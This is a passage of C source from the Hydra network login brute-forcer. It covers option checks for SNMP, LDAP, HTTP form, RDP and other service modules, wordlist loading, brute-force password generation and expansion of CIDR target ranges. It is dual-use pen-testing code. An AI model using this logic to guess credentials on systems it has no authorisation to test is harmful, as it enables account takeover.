}\n if (strcmp(hydra_options.service, \"snmp\") == 0 && hydra_options.miscptr != NULL) {\n char *lptr;\n\n j = 1;\n tmpptr = strdup(hydra_options.miscptr);\n lptr = strtok(tmpptr, \":\");\n while (lptr != NULL) {\n i = 0;\n if (strcasecmp(lptr, \"1\") == 0 || strcasecmp(lptr, \"2\") == 0 || strcasecmp(lptr, \"3\") == 0) {\n i = 1;\n j = lptr[0] - '0' + (j & 252);\n } else if (strcasecmp(lptr, \"READ\") == 0 || strcasecmp(lptr, \"WRITE\") == 0 || strcasecmp(lptr, \"PLAIN\") == 0)\n i = 1;\n else if (strcasecmp(lptr, \"MD5\") == 0) {\n i = 1;\n j = 4 + (j & 51);\n } else if (strcasecmp(lptr, \"SHA\") == 0 || strcasecmp(lptr, \"SHA1\") == 0) {\n i = 1;\n j = 8 + (j & 51);\n } else if (strcasecmp(lptr, \"DES\") == 0) {\n i = 1;\n j = 16 + (j & 15);\n } else if (strcasecmp(lptr, \"AES\") == 0) {\n i = 1;\n j = 32 + (j & 15);\n }\n if (i == 0) {\n fprintf(stderr, \"[ERROR] unknown parameter in module option: %s\\n\", lptr);\n exit(-1);\n }\n lptr = strtok(NULL, \":\");\n }\n i = 2;\n if ((j & 3) < 3 && j > 2)\n fprintf(stderr, \"[WARNING] SNMPv1 and SNMPv2 do not support hash and \"\n \"encryption, ignored\\n\");\n if ((j & 3) == 3) {\n fprintf(stderr, \"[WARNING] SNMPv3 is still in beta state, use at own \"\n \"risk and report problems\\n\");\n if (j >= 16)\n bail(\"The SNMPv3 module so far only support authentication \"\n \"(md5/sha), not yet encryption\\n\");\n if (hydra_options.colonfile == NULL && ((hydra_options.login == NULL && hydra_options.loginfile == NULL) || (hydra_options.pass == NULL && hydra_options.passfile == NULL && hydra_options.bfg == 0))) {\n if (j > 3) {\n fprintf(stderr, \"[ERROR] you specified SNMPv3, defined hashing/encryption but \"\n \"only gave one of login or password list. Either supply both \"\n \"logins and passwords (this is what is usually used in \"\n \"SNMPv3), or remove the hashing/encryption option (unusual)\\n\");\n exit(-1);\n }\n fprintf(stderr, \"[WARNING] you specified SNMPv3 but gave no logins, \"\n \"NoAuthNoPriv is assumed. This is an unusual case, \"\n \"you should know what you are doing\\n\");\n tmpptr = malloc(strlen(hydra_options.miscptr) + 8);\n strcpy(tmpptr, hydra_options.miscptr);\n strcat(tmpptr, \":\");\n strcat(tmpptr, \"PLAIN\");\n hydra_options.miscptr = tmpptr;\n } else {\n i = 1; // snmpv3 with login+pass mode\n#ifndef LIBOPENSSL\n bail(\"hydra was not compiled with OPENSSL support, snmpv3 can only \"\n \"be used on NoAuthNoPriv mode (only logins, no passwords)!\");\n#endif\n printf(\"[INFO] Using %s SNMPv3 with %s authentication and %s privacy\\n\", j > 16 ? \"AuthPriv\" : \"AuthNoPriv\", (j & 8) == 8 ? \"SHA\" : \"MD5\", (j & 16) == 16 ? \"DES\" : (j > 16) ? \"AES\" : \"no\");\n }\n }\n }\n if (strcmp(hydra_options.service, \"sip\") == 0) {\n if (hydra_options.miscptr == NULL) {\n if (hydra_options.server != NULL) {\n hydra_options.miscptr = hydra_options.server;\n i = 1;\n } else {\n bail(\"The sip module does not work with multiple servers (-M)\\n\");\n }\n } else {\n i = 1;\n }\n }\n if (strcmp(hydra_options.service, \"ldap\") == 0) {\n bail(\"Please select ldap2 or ldap3 for simple authentication or \"\n \"ldap3-crammd5 or ldap3-digestmd5\\n\");\n }\n if (strcmp(hydra_options.service, \"ldap2\") == 0 || strcmp(hydra_options.service, \"ldap3\") == 0) {\n i = 1;\n if ((hydra_options.miscptr != NULL && hydra_options.login != NULL) || (hydra_options.miscptr != NULL && hydra_options.loginfile != NULL) || (hydra_options.login != NULL && hydra_options.loginfile != NULL))\n bail(\"you may only use one of -l, -L or -m\\n\");\n if (hydra_options.login == NULL && hydra_options.loginfile == NULL && hydra_options.miscptr == NULL)\n fprintf(stderr, \"[WARNING] no DN to authenticate is defined, using DN \"\n \"of null (use -m, -l or -L to define DNs)\\n\");\n if (hydra_options.login == NULL && hydra_options.loginfile == NULL) {\n i = 2;\n }\n }\n if (strcmp(hydra_options.service, \"ldap3-crammd5\") == 0 || strcmp(hydra_options.service, \"ldap3-digestmd5\") == 0) {\n i = 1;\n if (hydra_options.login == NULL && hydra_options.loginfile == NULL)\n bail(\"-l or -L option is required to specify the login\\n\");\n if (hydra_options.miscptr == NULL)\n bail(\"-m option is required to specify the DN\\n\");\n }\n if (strcmp(hydra_options.service, \"rtsp\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"rpcap\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"s7-300\") == 0) {\n if (hydra_options.tasks > 8) {\n fprintf(stderr, \"[INFO] Reduced number of tasks to 8 (the PLC does not \"\n \"like more connections)\\n\");\n hydra_options.tasks = 8;\n }\n i = 2;\n }\n if (strcmp(hydra_options.service, \"cisco-enable\") == 0) {\n if (hydra_options.login != NULL || hydra_options.loginfile != NULL)\n i = 1; // login will be the initial Username: login, or line Password:\n else\n i = 2;\n if (hydra_options.miscptr == NULL)\n fprintf(stderr, \"[WARNING] You did not supply the initial support to \"\n \"the Cisco via -l, assuming direct console access\\n\");\n if (hydra_options.tasks > 4)\n fprintf(stderr, \"[WARNING] you should set the number of parallel task \"\n \"to 4 for cisco enable services.\\n\");\n }\n if (strcmp(hydra_options.service, \"http-proxy-urlenum\") == 0) {\n i = 4;\n hydra_options.pass = empty_login;\n if (hydra_options.miscptr == NULL) {\n fprintf(stderr, \"[WARNING] You did not supply proxy credentials via \"\n \"the optional parameter\\n\");\n }\n if (hydra_options.bfg || hydra_options.passfile != NULL)\n bail(\"the http-proxy-urlenum does not need the -p/-P or -x option\");\n }\n if (strcmp(hydra_options.service, \"vnc\") == 0) {\n i = 2;\n if (hydra_options.tasks > 4)\n fprintf(stderr, \"[WARNING] you should set the number of parallel task \"\n \"to 4 for vnc services.\\n\");\n }\n if (strcmp(hydra_options.service, \"https-head\") == 0 || strcmp(hydra_options.service, \"https-get\") == 0 || strcmp(hydra_options.service, \"https-post\") == 0) {\n#ifdef LIBOPENSSL\n i = 1;\n hydra_options.ssl = 1;\n if (strcmp(hydra_options.service, \"https-head\") == 0)\n strcpy(hydra_options.service, \"http-head\");\n else if (strcmp(hydra_options.service, \"https-post\") == 0)\n strcpy(hydra_options.service, \"http-post\");\n else\n strcpy(hydra_options.service, \"http-get\");\n#else\n bail(\"Compiled without SSL support, module not available\");\n#endif\n }\n if (strcmp(hydra_options.service, \"http-get\") == 0 || strcmp(hydra_options.service, \"http-head\") == 0 || strcmp(hydra_options.service, \"http-post\") == 0) {\n i = 1;\n if (hydra_options.miscptr == NULL) {\n fprintf(stderr, \"[WARNING] You must supply the web page as an \"\n \"additional option or via -m, default path set to /\\n\");\n hydra_options.miscptr = malloc(2);\n hydra_options.miscptr = \"/\";\n }\n if (*hydra_options.miscptr != '/' && strstr(hydra_options.miscptr, \"://\") == NULL)\n bail(\"The web page you supplied must start with a \\\"/\\\", \\\"http://\\\" \"\n \"or \\\"https://\\\", e.g. \\\"/protected/login\\\"\");\n if (getenv(\"HYDRA_PROXY_HTTP\") && getenv(\"HYDRA_PROXY\"))\n bail(\"Found HYDRA_PROXY_HTTP *and* HYDRA_PROXY environment variables - \"\n \"you can use only ONE for the service http-head/http-get!\");\n if (getenv(\"HYDRA_PROXY_HTTP\")) {\n printf(\"[INFO] Using HTTP Proxy: %s\\n\", getenv(\"HYDRA_PROXY_HTTP\"));\n use_proxy = 1;\n }\n if (strcmp(hydra_options.service, \"http-head\") == 0)\n fprintf(stderr, \"[WARNING] http-head auth does not work with every \"\n \"server, better use http-get\\n\");\n }\n\n if (strcmp(hydra_options.service, \"http-get-form\") == 0 || strcmp(hydra_options.service, \"http-post-form\") == 0 || strcmp(hydra_options.service, \"https-get-form\") == 0 || strcmp(hydra_options.service, \"https-post-form\") == 0) {\n char bufferurl[6096 + 24], *url, *variables, *cond,\n *optional1; // 6096 comes from issue 192 on github. Extra 24 bytes for\n // null padding.\n\n if (strncmp(hydra_options.service, \"http-\", 5) == 0) {\n i = 1;\n } else { // https\n#ifdef LIBOPENSSL\n i = 1;\n hydra_options.ssl = 1;\n if (strcmp(hydra_options.service, \"https-post-form\") == 0)\n strcpy(hydra_options.service, \"http-post-form\");\n else\n strcpy(hydra_options.service, \"http-get-form\");\n#else\n bail(\"Compiled without SSL support, module not available\");\n#endif\n }\n if (hydra_options.infile_ptr == NULL) {\n if (hydra_options.miscptr == NULL) {\n fprintf(stderr, \"[WARNING] You must supply the web page as an \"\n \"additional option or via -m, default path set to /\\n\");\n hydra_options.miscptr = malloc(2);\n hydra_options.miscptr = \"/\";\n }\n // if (*hydra_options.miscptr != '/' && strstr(hydra_options.miscptr,\n // \"://\") == NULL)\n // bail(\"The web page you supplied must start with a \\\"/\\\", \\\"http://\\\"\n // or \\\"https://\\\", e.g. \\\"/protected/login\\\"\");\n if (hydra_options.miscptr[0] != '/')\n bail(\"optional parameter must start with a '/' slash!\\n\");\n if (getenv(\"HYDRA_PROXY_HTTP\") && getenv(\"HYDRA_PROXY\"))\n bail(\"Found HYDRA_PROXY_HTTP *and* HYDRA_PROXY environment variables - \"\n \"you can use only ONE for the service http-head/http-get!\");\n if (getenv(\"HYDRA_PROXY_HTTP\")) {\n printf(\"[INFO] Using HTTP Proxy: %s\\n\", getenv(\"HYDRA_PROXY_HTTP\"));\n use_proxy = 1;\n }\n if (strstr(hydra_options.miscptr, \"\\\\:\") != NULL) {\n fprintf(stderr, \"[INFORMATION] escape sequence \\\\: detected in module \"\n \"option, no parameter verification is performed.\\n\");\n } else {\n sprintf(bufferurl, \"%.6000s\", hydra_options.miscptr);\n url = strtok(bufferurl, \":\");\n variables = strtok(NULL, \":\");\n cond = strtok(NULL, \":\");\n optional1 = strtok(NULL, \"\\n\");\n if ((variables == NULL) || (strstr(variables, \"^USER^\") == NULL && strstr(variables, \"^PASS^\") == NULL && strstr(variables, \"^USER64^\") == NULL && strstr(variables, \"^PASS64^\") == NULL)) {\n fprintf(stderr,\n \"[ERROR] the variables argument needs at least the strings \"\n \"^USER^, ^PASS^, ^USER64^ or ^PASS64^: %s\\n\",\n STR_NULL(variables));\n exit(-1);\n }\n if ((url == NULL) || (cond == NULL)) {\n fprintf(stderr,\n \"[ERROR] Wrong syntax, requires three arguments separated by \"\n \"a colon which may not be null: %s\\n\",\n bufferurl);\n exit(-1);\n }\n while ((optional1 = strtok(NULL, \":\")) != NULL) {\n if (optional1[1] != '=' && optional1[1] != ':' && optional1[1] != 0) {\n fprintf(stderr, \"[ERROR] Wrong syntax of optional argument: %s\\n\", optional1);\n exit(-1);\n }\n\n switch (optional1[0]) {\n case 'C': // fall through\n case 'c':\n if (optional1[1] != '=' || optional1[2] != '/') {\n fprintf(stderr,\n \"[ERROR] Wrong syntax of parameter C, must look like \"\n \"'C=/url/of/page', not http:// etc.: %s\\n\",\n optional1);\n exit(-1);\n }\n break;\n case 'H': // fall through\n case 'h':\n if (optional1[1] != '=' || strtok(NULL, \":\") == NULL) {\n fprintf(stderr,\n \"[ERROR] Wrong syntax of parameter H, must look like \"\n \"'H=X-My-Header: MyValue', no http:// : %s\\n\",\n optional1);\n exit(-1);\n }\n break;\n default:\n fprintf(stderr, \"[ERROR] Unknown optional argument: %s\\n\", optional1);\n }\n }\n }\n }\n }\n\n if (strcmp(hydra_options.service, \"xmpp\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"irc\") == 0)\n i = 1;\n if (strcmp(hydra_options.service, \"rdp\") == 0) {\n if (hydra_options.tasks > 4)\n fprintf(stderr, \"[WARNING] rdp servers often don't like many connections, use -t 1 \"\n \"or -t 4 to reduce the number of parallel connections and -W 1 or \"\n \"-W 3 to wait between connection to allow the server to recover\\n\");\n if (hydra_options.tasks > 4) {\n fprintf(stderr, \"[INFO] Reduced number of tasks to 4 (rdp does not \"\n \"like many parallel connections)\\n\");\n hydra_options.tasks = 4;\n }\n if (conwait == 0)\n hydra_options.conwait = conwait = 1;\n printf(\"[WARNING] the rdp module is experimental. Please test, report - \"\n \"and if possible, fix.\\n\");\n i = 1;\n }\n if (strcmp(hydra_options.service, \"radmin2\") == 0) {\n#ifdef HAVE_GCRYPT\n i = 1;\n#else\n bail(\"hydra was not compiled with gcrypt support, radmin2 module not \"\n \"available\");\n#endif\n }\n\n // ADD NEW SERVICES HERE\n\n if (i == 0) {\n fprintf(stderr, \"[ERROR] Unknown service: %s\\n\", hydra_options.service);\n exit(-1);\n }\n if (port < 1 || port > 65535) {\n if ((port = hydra_lookup_port(hydra_options.service)) < 1) {\n fprintf(stderr, \"[ERROR] No valid port set or no default port \"\n \"available. Use the -s Option.\\n\");\n exit(-1);\n }\n hydra_options.port = port;\n }\n\n if (hydra_options.login == NULL && hydra_options.loginfile == NULL && hydra_options.colonfile == NULL)\n hydra_options.exit_found = 1;\n\n if (hydra_options.ssl == 0 && hydra_options.port == 443)\n fprintf(stderr, \"[WARNING] you specified port 443 for attacking a http \"\n \"service, however did not specify the -S ssl switch nor \"\n \"used https-..., therefore using plain HTTP\\n\");\n\n if (hydra_options.loop_mode && hydra_options.colonfile != NULL)\n bail(\"The loop mode option (-u) works with all modes - except colon \"\n \"files (-C)\\n\");\n if (strncmp(hydra_options.service, \"http-\", strlen(\"http-\")) != 0 && strcmp(hydra_options.service, \"http-head\") != 0 && getenv(\"HYDRA_PROXY_HTTP\") != NULL)\n fprintf(stderr, \"[WARNING] the HYDRA_PROXY_HTTP environment variable works only \"\n \"with the http-head/http-get module, ignored...\\n\");\n if (i == 2) {\n if (hydra_options.colonfile != NULL || ((hydra_options.login != NULL || hydra_options.loginfile != NULL) && (hydra_options.pass != NULL || hydra_options.passfile != NULL || hydra_options.bfg > 0)))\n bail(\"The redis, adam6500, cisco, oracle-listener, s7-300, snmp and \"\n \"vnc modules are only using the -p or -P option, not login (-l, \"\n \"-L) or colon file (-C).\\nUse the telnet module for cisco using \"\n \"\\\"Username:\\\" authentication.\\n\");\n if ((hydra_options.login != NULL || hydra_options.loginfile != NULL) && (hydra_options.pass == NULL || hydra_options.passfile == NULL)) {\n hydra_options.pass = hydra_options.login;\n hydra_options.passfile = hydra_options.loginfile;\n }\n hydra_options.login = empty_login;\n hydra_options.loginfile = NULL;\n }\n if (i == 3) {\n if (hydra_options.colonfile != NULL || hydra_options.bfg > 0 || ((hydra_options.login != NULL || hydra_options.loginfile != NULL) && (hydra_options.pass != NULL || hydra_options.passfile != NULL)))\n bail(\"The rsh, oracle-sid login is neither using the -p, -P or -x \"\n \"options nor colon file (-C)\\n\");\n if ((hydra_options.login == NULL || hydra_options.loginfile == NULL) && (hydra_options.pass != NULL || hydra_options.passfile != NULL)) {\n hydra_options.login = hydra_options.pass;\n hydra_options.loginfile = hydra_options.passfile;\n }\n hydra_options.pass = empty_login;\n hydra_options.passfile = NULL;\n }\n if (i == 3 && hydra_options.login == NULL && hydra_options.loginfile == NULL)\n bail(\"I need at least either the -l or -L option to know the login\");\n if (i == 2 && hydra_options.pass == NULL && hydra_options.passfile == NULL && hydra_options.bfg == 0)\n bail(\"I need at least either the -p, -P or -x option to have a password \"\n \"to try\");\n if (i == 1 && hydra_options.login == NULL && hydra_options.loginfile == NULL && hydra_options.colonfile == NULL)\n bail(\"I need at least either the -l, -L or -C option to know the login\");\n if (hydra_options.colonfile != NULL && ((hydra_options.bfg != 0 || hydra_options.login != NULL || hydra_options.loginfile != NULL) || (hydra_options.pass != NULL && hydra_options.passfile != NULL)))\n bail(\"The -C option is standalone, don't use it with -l/L, -p/P or -x!\");\n if ((hydra_options.bfg) && ((hydra_options.pass != NULL) || (hydra_options.passfile != NULL) || (hydra_options.colonfile != NULL)))\n bail(\"The -x (password bruteforce generation option) doesn't work with \"\n \"-p/P, -C or -e!\\n\");\n if (hydra_options.try_password_reverse_login == 0 && hydra_options.try_password_same_as_login == 0 && hydra_options.try_null_password == 0 && (i != 3 && (hydra_options.pass == NULL && hydra_options.passfile == NULL && hydra_options.colonfile == NULL)) && hydra_options.bfg == 0) {\n // test if the service is smtp-enum as it could be used either with a\n // login+pass or only a login\n if (strstr(hydra_options.service, \"smtp-enum\") != NULL)\n hydra_options.pass = empty_login;\n else\n bail(\"I need at least the -e, -p, -P or -x option to have some \"\n \"passwords!\");\n }\n if (hydra_options.tasks < 1 || hydra_options.tasks > MAXTASKS) {\n fprintf(stderr, \"[ERROR] Option -t needs to be a number between 1 and %d\\n\", MAXTASKS);\n exit(-1);\n }\n if (hydra_options.max_use > MAXTASKS) {\n fprintf(stderr, \"[WARNING] reducing maximum tasks to MAXTASKS (%d)\\n\", MAXTASKS);\n hydra_options.max_use = MAXTASKS;\n }\n // script kiddie patch\n if (hydra_options.server != NULL && (hydra_strcasestr(hydra_options.server, \".outlook.com\") != NULL || hydra_strcasestr(hydra_options.server, \".hotmail.com\") != NULL || hydra_strcasestr(hydra_options.server, \".yahoo.\") != NULL || hydra_strcasestr(hydra_options.server, \".gmx.\") != NULL || hydra_strcasestr(hydra_options.server, \".web.de\") != NULL || hydra_strcasestr(hydra_options.server, \".gmail.\") != NULL || hydra_strcasestr(hydra_options.server, \"googlemail.\") != NULL)) {\n fprintf(stderr, \"[WARNING] Google Mail and others have bruteforce and \"\n \"hydra detection and send false positives. You are not \"\n \"doing anything illegal right?!\\n\");\n fprintf(stderr, \"[WARNING] !read the above!\\n\");\n sleep(5);\n }\n if (hydra_options.colonfile == NULL) {\n if (hydra_options.loginfile != NULL) {\n if ((lfp = fopen(hydra_options.loginfile, \"r\")) == NULL) {\n fprintf(stderr, \"[ERROR] File for logins not found: %s\\n\", hydra_options.loginfile);\n exit(-1);\n } else if (hydra_options.passfile == NULL) {\n if (my_segment && num_segments) {\n filecloser = lfp;\n lfp = hydra_divide_file(lfp, my_segment, num_segments);\n fclose(filecloser);\n }\n }\n hydra_brains.countlogin = countlines(lfp, 0);\n hydra_brains.sizelogin = size_of_data;\n if (hydra_brains.countlogin == 0) {\n fprintf(stderr, \"[ERROR] File for logins is empty: %s\\n\", hydra_options.loginfile);\n exit(-1);\n }\n if (hydra_brains.countlogin > MAX_LINES) {\n fprintf(stderr, \"[ERROR] Maximum number of logins is %d, this file has %\" hPRIu64 \" entries.\\n\", MAX_LINES, hydra_brains.countlogin);\n exit(-1);\n }\n if (hydra_brains.sizelogin > MAX_BYTES) {\n fprintf(stderr,\n \"[ERROR] Maximum size of the login file is %d, this file has \"\n \"%\" hPRIu64 \" bytes.\\n\",\n MAX_BYTES, (uint64_t)hydra_brains.sizelogin);\n exit(-1);\n }\n login_ptr = malloc(hydra_brains.sizelogin + hydra_brains.countlogin + 8);\n if (login_ptr == NULL)\n bail(\"Could not allocate enough memory for login file data\");\n memset(login_ptr, 0, hydra_brains.sizelogin + hydra_brains.countlogin + 8);\n fill_mem(login_ptr, lfp, 0);\n } else {\n login_ptr = hydra_options.login;\n hydra_brains.sizelogin = strlen(hydra_options.login) + 1;\n hydra_brains.countlogin = 1;\n }\n if (hydra_options.passfile != NULL) {\n if ((pfp = fopen(hydra_options.passfile, \"r\")) == NULL) {\n fprintf(stderr, \"[ERROR] File for passwords not found: %s\\n\", hydra_options.passfile);\n exit(-1);\n } else if (my_segment && num_segments) {\n filecloser = pfp;\n pfp = hydra_divide_file(pfp, my_segment, num_segments);\n fclose(filecloser);\n }\n hydra_brains.countpass = countlines(pfp, 0);\n hydra_brains.sizepass = size_of_data;\n if (hydra_brains.countpass == 0) {\n fprintf(stderr, \"[ERROR] File for passwords is empty: %s\\n\", hydra_options.passfile);\n exit(-1);\n }\n if (hydra_brains.countpass > MAX_LINES) {\n fprintf(stderr,\n \"[ERROR] Maximum number of passwords is %d, this file has \"\n \"%\" hPRIu64 \" entries.\\n\",\n MAX_LINES, hydra_brains.countpass);\n exit(-1);\n }\n if (hydra_brains.sizepass > MAX_BYTES) {\n fprintf(stderr,\n \"[ERROR] Maximum size of the password file is %d, this file \"\n \"has %\" hPRIu64 \" bytes.\\n\",\n MAX_BYTES, (uint64_t)hydra_brains.sizepass);\n exit(-1);\n }\n pass_ptr = malloc(hydra_brains.sizepass + hydra_brains.countpass + 8);\n if (pass_ptr == NULL)\n bail(\"Could not allocate enough memory for password file data\");\n memset(pass_ptr, 0, hydra_brains.sizepass + hydra_brains.countpass + 8);\n fill_mem(pass_ptr, pfp, 0);\n } else {\n if (hydra_options.pass != NULL) {\n pass_ptr = hydra_options.pass;\n hydra_brains.countpass = 1;\n hydra_brains.sizepass = strlen(hydra_options.pass) + 1;\n } else {\n if (hydra_options.bfg) {\n#ifdef HAVE_MATH_H\n if (bf_init(bf_options.arg))\n exit(-1); // error description is handled by bf_init\n\n pass_ptr = bf_next();\n hydra_brains.countpass += bf_get_pcount();\n hydra_brains.sizepass += BF_BUFLEN;\n#else\n sleep(1);\n#endif\n } else {\n pass_ptr = hydra_options.pass = empty_login;\n hydra_brains.countpass = 0;\n hydra_brains.sizepass = 1;\n }\n }\n }\n } else {\n if ((cfp = fopen(hydra_options.colonfile, \"r\")) == NULL) {\n fprintf(stderr, \"[ERROR] File for colon files (login:pass) not found: %s\\n\", hydra_options.colonfile);\n exit(-1);\n } else if (my_segment && num_segments) {\n filecloser = cfp;\n cfp = hydra_divide_file(cfp, my_segment, num_segments);\n fclose(filecloser);\n }\n hydra_brains.countlogin = countlines(cfp, 1);\n hydra_brains.sizelogin = size_of_data;\n if (hydra_brains.countlogin == 0) {\n fprintf(stderr, \"[ERROR] File for colon files (login:pass) is empty: %s\\n\", hydra_options.colonfile);\n exit(-1);\n }\n if (hydra_brains.countlogin > MAX_LINES / 2) {\n fprintf(stderr,\n \"[ERROR] Maximum number of colon file entries is %d, this file \"\n \"has %\" hPRIu64 \" entries.\\n\",\n MAX_LINES / 2, hydra_brains.countlogin);\n exit(-1);\n }\n if (hydra_brains.sizelogin > MAX_BYTES / 2) {\n fprintf(stderr,\n \"[ERROR] Maximum size of the colon file is %d, this file has \"\n \"%\" hPRIu64 \" bytes.\\n\",\n MAX_BYTES / 2, (uint64_t)hydra_brains.sizelogin);\n exit(-1);\n }\n csv_ptr = malloc(hydra_brains.sizelogin + 2 * hydra_brains.countlogin + 8);\n if (csv_ptr == NULL)\n bail(\"Could not allocate enough memory for colon file data\");\n memset(csv_ptr, 0, hydra_brains.sizelogin + 2 * hydra_brains.countlogin + 8);\n fill_mem(csv_ptr, cfp, 1);\n // printf(\"count: %d, size: %d\\n\", hydra_brains.countlogin,\n // hydra_brains.sizelogin); hydra_dump_data(csv_ptr,\n // hydra_brains.sizelogin\n // + hydra_brains.countlogin + 8, \"colon data\");\n hydra_brains.countpass = 1;\n pass_ptr = login_ptr = csv_ptr;\n while (*pass_ptr != 0)\n pass_ptr++;\n pass_ptr++;\n }\n\n hydra_brains.countpass += hydra_options.try_password_reverse_login + hydra_options.try_password_same_as_login + hydra_options.try_null_password;\n if ((memcheck = malloc(102400)) == NULL) {\n fprintf(stderr, \"[ERROR] your wordlist is too large, not enough memory!\\n\");\n exit(-1);\n }\n free(memcheck);\n if ((rfp = fopen(RESTOREFILE, \"r\")) != NULL) {\n fprintf(stderr,\n \"[WARNING] Restorefile (%s) from a previous session found, to \"\n \"prevent overwriting, %s\\n\",\n ignore_restore == 1 ? \"ignored ...\"\n : \"you have 10 seconds to abort... (use \"\n \"option -I to skip waiting)\",\n RESTOREFILE);\n if (ignore_restore != 1)\n sleep(10);\n fclose(rfp);\n }\n\n if (hydra_options.infile_ptr != NULL) {\n if ((ifp = fopen(hydra_options.infile_ptr, \"r\")) == NULL) {\n fprintf(stderr, \"[ERROR] File for targets not found: %s\\n\", hydra_options.infile_ptr);\n exit(-1);\n }\n hydra_brains.targets = countservers = countinfile = countlines(ifp, 0);\n if (countinfile == 0) {\n fprintf(stderr, \"[ERROR] File for targets is empty: %s\\n\", hydra_options.infile_ptr);\n exit(-1);\n }\n // if (countinfile > 60) fprintf(stderr, \"[WARNING] the -M option is not\n // working correctly at the moment for target lists > 60!\\n\");\n hydra_targets = malloc(sizeof(hydra_target *) * (countservers + 2) + 8);\n if (hydra_targets == NULL)\n bail(\"Could not allocate enough memory for target data\");\n sizeinfile = size_of_data;\n if (countinfile > MAX_LINES / 1000) {\n fprintf(stderr,\n \"[ERROR] Maximum number of target file entries is %d, this \"\n \"file has %d entries.\\n\",\n MAX_LINES / 1000, (int32_t)countinfile);\n exit(-1);\n }\n if (sizeinfile > MAX_BYTES / 1000) {\n fprintf(stderr,\n \"[ERROR] Maximum size of the server file is %d, this file has \"\n \"%d bytes.\\n\",\n MAX_BYTES / 1000, (int32_t)sizeinfile);\n exit(-1);\n }\n if ((servers_ptr = malloc(sizeinfile + countservers + 8)) == NULL)\n bail(\"Could not allocate enough memory for target file data\");\n memset(servers_ptr, 0, sizeinfile + countservers + 8);\n fill_mem(servers_ptr, ifp, 0);\n sizeservers = sizeinfile;\n tmpptr = servers_ptr;\n for (i = 0; i < countinfile; i++) {\n hydra_targets[i] = malloc(sizeof(hydra_target));\n memset(hydra_targets[i], 0, sizeof(hydra_target));\n if (*tmpptr == '[') {\n tmpptr++;\n hydra_targets[i]->target = tmpptr;\n if ((tmpptr2 = strchr(tmpptr, ']')) != NULL) {\n *tmpptr2++ = 0;\n tmpptr = tmpptr2;\n }\n } else\n hydra_targets[i]->target = tmpptr;\n\n if ((tmpptr2 = strchr(tmpptr, ':')) != NULL) {\n *tmpptr2++ = 0;\n tmpptr = tmpptr2;\n hydra_targets[i]->port = atoi(tmpptr2);\n if (hydra_targets[i]->port < 1 || hydra_targets[i]->port > 65535)\n hydra_targets[i]->port = 0;\n }\n if (hydra_targets[i]->port == 0)\n hydra_targets[i]->port = hydra_options.port;\n\n if ((tmpptr3 = strchr(tmpptr, '/')) != NULL) {\n hydra_targets[i]->miscptr = tmpptr3;\n } else\n hydra_targets[i]->miscptr = hydra_options.miscptr;\n\n while (*tmpptr != 0)\n tmpptr++;\n tmpptr++;\n }\n } else if (hydra_options.server == NULL) {\n fprintf(stderr, \"Error: no target server given, nor -M option used\\n\");\n exit(-1);\n } else if (strchr(hydra_options.server, '/') != NULL) {\n if (cmdlinetarget == NULL)\n bail(\"You seem to mix up \\\"service://target:port/options\\\" syntax with \"\n \"\\\"target service options\\\" syntax. Read the README on how to use \"\n \"hydra correctly!\");\n if (strstr(cmdlinetarget, \"://\") != NULL) {\n tmpptr = strchr(hydra_options.server, '/');\n if (tmpptr != NULL)\n *tmpptr = 0;\n countservers = hydra_brains.targets = 1;\n hydra_targets = malloc(sizeof(hydra_target *) * 4);\n hydra_targets[0] = malloc(sizeof(hydra_target));\n memset(hydra_targets[0], 0, sizeof(hydra_target));\n hydra_targets[0]->target = servers_ptr = hydra_options.server;\n hydra_targets[0]->port = hydra_options.port;\n hydra_targets[0]->miscptr = hydra_options.miscptr;\n sizeservers = strlen(hydra_options.server) + 1;\n } else {\n /* CIDR notation on command line, e.g. 192.168.0.0/24 */\n uint32_t four_from, four_to, addr_cur, addr_cur2, k, l;\n in_addr_t addr4;\n struct sockaddr_in target;\n\n hydra_options.cidr = 1;\n do_retry = 0;\n if ((tmpptr = malloc(strlen(hydra_options.server) + 1)) == NULL) {\n fprintf(stderr, \"Error: can not allocate memory\\n\");\n exit(-1);\n }\n strcpy(tmpptr, hydra_options.server);\n tmpptr2 = strchr(tmpptr, '/');\n *tmpptr2++ = 0;\n if ((k = atoi(tmpptr2)) < 16 || k > 31) {\n fprintf(stderr, \"Error: network size may only be between /16 and /31: %s\\n\", hydra_options.server);\n exit(-1);\n }\n if ((addr4 = htonl(inet_addr(tmpptr))) == 0xffffffff) {\n fprintf(stderr, \"Error: option is not a valid IPv4 address: %s\\n\", tmpptr);\n exit(-1);\n }\n free(tmpptr);\n l = 1 << (32 - k);\n l--;\n four_to = (addr4 | l);\n l = 0xffffffff - l;\n four_from = (addr4 & l);\n l = 1 << (32 - k);\n hydra_brains.targets = countservers = l;\n hydra_targets = (hydra_target **)malloc(sizeof(hydra_target *) * (l + 2) + 8);\n if (hydra_targets == NULL)\n bail(\"Could not allocate enough memory for target data\");\n i = 0;\n addr_cur = four_from;\n while (addr_cur <= four_to && i < l) {\n hydra_targets[i] = malloc(sizeof(hydra_target));\n memset(hydra_targets[i], 0, sizeof(hydra_target));\n addr_cur2 = htonl(addr_cur);\n memcpy(&target.sin_addr.s_addr, (char *)&addr_cur2, 4);\n hydra_targets[i]->target = strdup(inet_ntoa((struct in_addr)target.sin_addr));\n hydra_targets[i]->port = hydra_options.port;\n hydra_targets[i]->miscptr = hydra_options.miscptr;\n addr_cur++;\n i++;\n }\n if (verbose)\n printf(\"[VERBOSE] CIDR attack from %s to %s\\n\", hydra_targets[0]->target, hydra_targets[l - 1]->target);\n printf(\"[WARNING] The CIDR attack mode is still beta. Please report \"\n \"issues.\\n\");\n }\n } else { // standard: single target on command line\n countservers = hydra_brains.targets = 1;\n hydra_targets = malloc(sizeof(hydra_target *) * 4);\n hydra_targets[0] = malloc(sizeof(hydra_target));\n memset(hydra_targets[0], 0, sizeof(hydra_target));\n hydra_targets[0]->target = servers_ptr = hydra_options.server;\n hydra_targets[0]->port = hydra_options.port;\n hydra_targets[0]->miscptr = hydra_options.miscptr;\n sizeservers = strlen(hydra_options.server) + 1;\n }\n for (i = 0; i < hydra_brains.targets; i++) {\n hydra_targets[i]->login_ptr = login_ptr;\n hydra_targets[i]->pass_ptr = pass_ptr;\n if (hydra_options.loop_mode) {\n if (hydra_options.try_password_same_as_login)\n hydra_targets[i]->pass_state = 0;\n else if (hydra_options.try_null_password) {\n hydra_targets[i]->pass_ptr = empty_login;\n hydra_targets[i]->pass_state = 1;\n } else if 